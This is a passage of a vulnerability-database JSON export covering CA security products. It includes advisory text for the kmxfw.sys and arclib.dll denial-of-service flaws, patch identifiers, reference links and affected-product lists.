"id": "JVNDB-2008-003251"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
},
{
"db": "NVD",
"id": "CVE-2008-3174"
}
]
},
"id": "VAR-200808-0291",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-33299"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T23:05:19.791000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.ca.com/us/default.aspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-3174"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36560"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/30651"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1020661"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1020662"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id?1020663"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/31434"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/495397/100/0/threaded"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2008/2339"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44393"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3174"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-3174"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/44393"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/495397/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2008/2339"
},
{
"trust": 0.4,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=36559"
},
{
"trust": 0.3,
"url": "http://www.trapkit.de/advisories/tkadv2008-006.txt"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/495427"
},
{
"trust": 0.3,
"url": "/archive/1/495397"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/18834/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/31434/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/12660/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/16198/"
},
{
"trust": 0.1,
"url": "http://secunia.com/hardcore_disassembler_and_reverse_engineer/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19549/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_specialist/"
},
{
"trust": 0.1,
"url": "http://corporate.secunia.com/about_secunia/64/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14434/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/solutionresults?aparno=ro00535\u0026actionid=4"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-2926"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3174"
},
{
"trust": 0.1,
"url": "http://www.trapkit.de/"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://shop.ca.com/support."
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-2926"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=177782"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/redirarticles?reqpage=search\u0026se"
},
{
"trust": 0.1,
"url": "http://support.ca.com."
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=182496"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-33299"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
},
{
"db": "NVD",
"id": "CVE-2008-3174"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-33299"
},
{
"db": "BID",
"id": "30651"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"db": "PACKETSTORM",
"id": "68975"
},
{
"db": "PACKETSTORM",
"id": "69034"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
},
{
"db": "NVD",
"id": "CVE-2008-3174"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-12T00:00:00",
"db": "VULHUB",
"id": "VHN-33299"
},
{
"date": "2008-08-11T00:00:00",
"db": "BID",
"id": "30651"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"date": "2008-08-13T01:46:19",
"db": "PACKETSTORM",
"id": "68975"
},
{
"date": "2008-08-13T05:41:53",
"db": "PACKETSTORM",
"id": "69034"
},
{
"date": "2008-08-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-174"
},
{
"date": "2008-08-12T23:41:00",
"db": "NVD",
"id": "CVE-2008-3174"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-33299"
},
{
"date": "2008-08-25T22:25:00",
"db": "BID",
"id": "30651"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-003251"
},
{
"date": "2008-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-174"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2008-3174"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA Internet Security Suite Used for etc. CA HIPS of kmxfw.sys Service disruption in drivers (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-003251"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200808-174"
}
],
"trust": 0.6
}
}
VAR-200707-0263
Vulnerability from variot - Updated: 2025-04-10 23:03arclib.dll before 7.3.0.9 in CA Anti-Virus (formerly eTrust Antivirus) 8 and certain other CA products allows remote attackers to cause a denial of service (infinite loop and loss of antivirus functionality) via an invalid "previous listing chunk number" field in a CHM file. Multiple Computer Associates products are prone to a denial-of-service vulnerability because the applications fail to handle malformed CHM files. Successfully exploiting this issue will cause the affected applications to stop responding, denying service to legitimate users. This issue affects applications that use the 'arclib.dll' library versions prior to 7.3.0.9. The Arclib.DLL library in eTrust products has a security vulnerability. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Title: [CAID 35525, 35526]: CA Products Arclib Library Denial of Service Vulnerabilities
CA Vuln ID (CAID): 35525, 35526
CA Advisory Date: 2007-07-24
Reported By: CVE-2006-5645 - Titon of BastardLabs and Damian Put working with the iDefense VCP. CVE-2007-3875 - An anonymous researcher working with the iDefense VCP. Sergio Alvarez of n.runs AG also reported these issues.
Impact: A remote attacker can cause a denial of service.
Summary: CA products that utilize the Arclib library contain two denial of service vulnerabilities. The second vulnerability, CVE-2006-5645, is due to an application hang when processing a specially malformed RAR file.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a Medium risk rating.
Affected Products: CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.0, 7.1, r8, r8.1 CA Anti-Virus 2007 (v8) eTrust EZ Antivirus r7, r6.1 CA Internet Security Suite 2007 (v3) eTrust Internet Security Suite r1, r2 eTrust EZ Armor r1, r2, r3.x CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8 CA Anti-Virus Gateway (formerly eTrust Antivirus eTrust Antivirus Gateway) 7.1 CA Protection Suites r2, r3 CA Secure Content Manager (formerly eTrust Secure Content Manager) 1.1, 8.0 CA Anti-Spyware for the Enterprise (Formerly eTrust PestPatrol) r8, 8.1 CA Anti-Spyware 2007 Unicenter Network and Systems Management (NSM) r3.0, r3.1, r11, r11.1 BrightStor ARCserve Backup v9.01, r11 for Windows, r11.1, r11.5 BrightStor Enterprise Backup r10.5 BrightStor ARCserve Client agent for Windows eTrust Intrusion Detection 2.0 SP1, 3.0, 3.0 SP1 CA Common Services (CCS) r11, r11.1 CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)
Status and Recommendation: CA has provided an update to address the vulnerabilities. The updated Arclib library is provided in automatic content updates with most products. Ensure that the latest content update is installed. In the case where automatic updates are not available, use the following product specific instructions.
CA Secure Content Manager 1.1: Apply QO89469.
CA Secure Content Manager 8.0: Apply QO87114.
Unicenter Network and Systems Management (NSM) r3.0: Apply QO89141.
Unicenter Network and Systems Management (NSM) r3.1: Apply QO89139.
Unicenter Network and Systems Management (NSM) r11: Apply QO89140.
Unicenter Network and Systems Management (NSM) r11.1: Apply QO89138.
CA Common Services (CCS) r11: Apply QO89140.
CA Common Services (CCS) r11.1: Apply QO89138.
CA Anti-Virus Gateway 7.1: Apply QO89381.
eTrust Intrusion Detection 2.0 SP1: Apply QO89474.
eTrust Intrusion Detection 3.0: Apply QO86925.
eTrust Intrusion Detection 3.0 SP1: Apply QO86923.
CA Protection Suites r2: Apply updates for CA Anti-Virus 7.1.
BrightStor ARCserve Backup and BrightStor ARCserve Client agent for Windows:
Manually replace the arclib.dll file with the one provided in the CA Anti-Virus 7.1 fix set.
- Locate and rename the existing arclib.dll file.
- Download the CA Anti-Virus 7.1 patch that matches the host operating system.
- Unpack the patch and place the arclib.dll file in directory where the existing arclib.dll file was found in step 1.
- Reboot the host.
CA Anti-Virus 7.1 (non Windows):
T229327 – Solaris – QO86831 T229328 – Netware – QO86832 T229329 – MacPPC – QO86833 T229330 – MacIntel – QO86834 T229331 – Linux390 – QO86835 T229332 – Linux – QO86836 T229333 – HP-UX – QO86837
CA Anti-Virus 7.1 (Windows):
T229337 – NT (32 bit) – QO86843 T229338 – NT (AMD64) – QO86846
CA Threat Manager for the Enterprise r8.1 (non Windows):
T229334 – Linux – QO86839 T229335 – Mac – QO86828 T229336 – Solaris – QO86829
How to determine if you are affected: For products on Windows: 1. Using Windows Explorer, locate the file “arclib.dll”. By default, the file is located in the “C:\Program Files\CA\SharedComponents\ScanEngine” directory(*). 2. Right click on the file and select Properties. 3. Select the Version tab. 4. If the file version is earlier than indicated in the table below, the installation is vulnerable.
File Name File Version arclib.dll 7.3.0.9
*For eTrust Intrusion Detection 2.0 the file is located in “Program Files\eTrust\Intrusion Detection\Common”, and for eTrust Intrusion Detection 3.0 and 3.0 sp1, the file is located in “Program Files\CA\Intrusion Detection\Common”.
For CA Anti-Virus r8.1 on non-Windows: Use the compver utility provided on the CD to determine the version of arclib.dll. The same version information above applies.
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ Security Notice for CA Products Containing Arclib http://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot .asp Solution Document Reference APARs: QO89469, QO87114, QO89141, QO89139, QO89140, QO89138, QO89140, QO89138, QO89381, QO89474, QO86925, QO86923, QO86831, QO86832, QO86833, QO86834, QO86835, QO86836, QO86837, QO86843, QO86846, QO86839, QO86828, QO86829 CA Security Advisor posting: CA Products Arclib Library Denial of Service Vulnerabilities http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=149847 CA Vuln ID (CAID): 35525, 35526 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35525 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35526 Reported By: CVE-2006-5645 - Titon of BastardLabs and Damian Put working with the iDefense VCP. CVE-2007-3875 - An anonymous researcher working with the iDefense VCP. Sergio Alvarez of n.runs AG also reported these issues. iDefense advisories: Computer Associates AntiVirus CHM File Handling DoS Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=567 Multiple Vendor Antivirus RAR File Denial of Service Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=439 CVE References: CVE-2006-5645, CVE-2007-3875 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5645 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3875 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFGpp9beSWR3+KUGYURAplHAJ4paEd/cX+2AxdBWfnw2zhfjAGQwACfW+mo tCqbonQi4DvtQ9a45c65y70= =o8Ac -----END PGP SIGNATURE----- . BACKGROUND
eTrust is an antivirus application developed by Computer Associates. More information can be found on the vendor's website at the following URL.
http://www3.ca.com/solutions/product.aspx?ID=156
II. DESCRIPTION
Remote exploitation of a denial of Service (DoS) vulnerability in Computer Associates Inc.'s eTrust Antivirus products could allow attackers to create a DoS condition on the affected computer.
III. ANALYSIS
This denial of service attack will prevent the scanner from scanning other files on disk while it is stuck on the exploit file. The hung process can be quit by the user and does not consume all system resources.
IV. DETECTION
iDefense has confirmed this vulnerability in eTrust AntiVirus version r8. Previous versions of eTrust Antivirus are suspected vulnerable. Other Computer Associates products, as well as derived products, may also be vulnerable.
V. WORKAROUND
iDefense is not aware of any workarounds for this issue.
VI. VENDOR RESPONSE
Computer Associates has addressed this vulnerability by releasing updates. More information is available within Computer Associates advisory at the following URL.
http://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot.asp
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3875 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
01/16/2007 Initial vendor notification 01/17/2007 Initial vendor response 07/24/2007 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.
The Full Featured Secunia Network Software Inspector (NSI) is now available: http://secunia.com/network_software_inspector/
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. scanning a specially crafted RAR archive. Please see the vendor's advisory for details. 2) The vendor credits Titon of BastardLabs and Damian Put, reported via iDefense Labs.
ORIGINAL ADVISORY: CA: http://supportconnectw.ca.com/public/antivirus/infodocs/caprodarclib-secnot.asp
iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=567
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200707-0263",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r3"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.4,
"vendor": "ca",
"version": "8"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "brightstor enterprise backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "10.5"
},
{
"model": "antispyware for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "brigthstor arcserve client for windows",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2.0"
},
{
"model": "anti-spyware",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2007"
},
{
"model": "threat manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "brightstor arcserve client",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r2"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.0"
},
{
"model": "anti virus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.0"
},
{
"model": "etrust internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "antispyware for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1"
},
{
"model": "etrust internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "anti-virus for the enterprise",
"scope": "lte",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "6.1"
},
{
"model": "antivirus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.5"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "11"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "brightstor arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "9.01"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "anti-spyware",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "brightstor arcserve backup",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "brightstor arcserve client",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "brightstor enterprise backup",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "brigthstor arcserve client for windows",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-spyware for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "anti-virus sdk",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "common services",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "protection suites",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "secure content manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "threat manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust antivirus gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "etrust ez armor",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "etrust internet security suite",
"scope": "eq",
"trust": 0.8,
"vendor": "ca",
"version": "8"
},
{
"model": "unicenter network and systems management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "threat manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8"
},
{
"model": "anti-spyware",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "2007"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "7.0"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "7.1"
},
{
"model": "common services",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "11"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.0"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "3.0"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.1"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.1"
},
{
"model": "associates protection suites r2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates etrust internet security suite r1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates anti-virus gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates etrust intrusion detection sp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.01"
},
{
"model": "associates anti-spyware for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates protection suites r3",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-spyware",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2007"
},
{
"model": "associates etrust antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.0"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20073.0"
},
{
"model": "associates etrust ez armor",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates brightstor arcserve backup",
